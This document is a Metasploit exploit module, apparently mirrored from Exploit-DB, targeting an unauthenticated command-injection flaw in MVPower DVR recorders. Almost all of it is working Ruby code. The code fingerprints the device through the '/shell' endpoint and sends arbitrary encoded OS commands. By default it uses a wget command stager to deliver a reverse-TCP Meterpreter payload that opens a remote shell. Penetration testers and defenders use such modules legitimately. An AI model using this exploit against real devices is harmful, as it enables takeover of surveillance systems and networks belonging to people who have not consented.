MVPower DVR TV-7104HE 1.8.4 115215B9 – Shell Command Execution (Metasploit)

  • 作者: Metasploit
    日期: 2017-02-27
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41471/
  • ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::CmdStager
    
    HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
    
    def initialize(info = {})
    super(update_info(info,
    'Name'=> 'MVPower DVR Shell Unauthenticated Command Execution',
    'Description' => %q{
    This module exploits an unauthenticated remote command execution
    vulnerability in MVPower digital video recorders. The 'shell' file
    on the web interface executes arbitrary operating system commands in
    the query string.
    
    This module was tested successfully on a MVPower model TV-7104HE with
    firmware version 1.8.4 115215B9 (Build 2014/11/17).
    
    The TV-7108HE model is also reportedly affected, but untested.
    },
    'Author'=>
    [
    'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
    'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
    'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
    ],
    'License' => MSF_LICENSE,
    'Platform'=> 'linux',
    'References'=>
    [
    # Comment from Paul Davies contains probably the first published PoC
    [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
    # Writeup with PoC by Andrew Tierney from Pen Test Partners
    [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
    ],
    'DisclosureDate' => 'Aug 23 2015',
    'Privileged' => true, # BusyBox
    'Arch' => ARCH_ARMLE,
    'DefaultOptions' =>
    {
    'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
    'CMDSTAGER::FLAVOR' => 'wget'
    },
    'Targets'=>
    [
    ['Automatic', {}]
    ],
    'CmdStagerFlavor' => %w{ echo printf wget },
    'DefaultTarget' => 0))
    end
    
    def check
    begin
    fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
    res = send_request_cgi(
    'uri' => "/shell?echo+#{fingerprint}",
    'headers' => { 'Connection' => 'Keep-Alive' }
    )
    if res && res.body.include?(fingerprint)
    return CheckCode::Vulnerable
    end
    rescue ::Rex::ConnectionError
    return CheckCode::Unknown
    end
    CheckCode::Safe
    end
    
    def execute_command(cmd, opts)
    begin
    send_request_cgi(
    'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
    'headers' => { 'Connection' => 'Keep-Alive' }
    )
    rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
    end
    
    def exploit
    print_status("#{peer} - Connecting to target")
    
    unless check == CheckCode::Vulnerable
    fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
    end
    
    print_good("#{peer} - Target is vulnerable!")
    
    execute_cmdstager(linemax: 1500)
    end
    end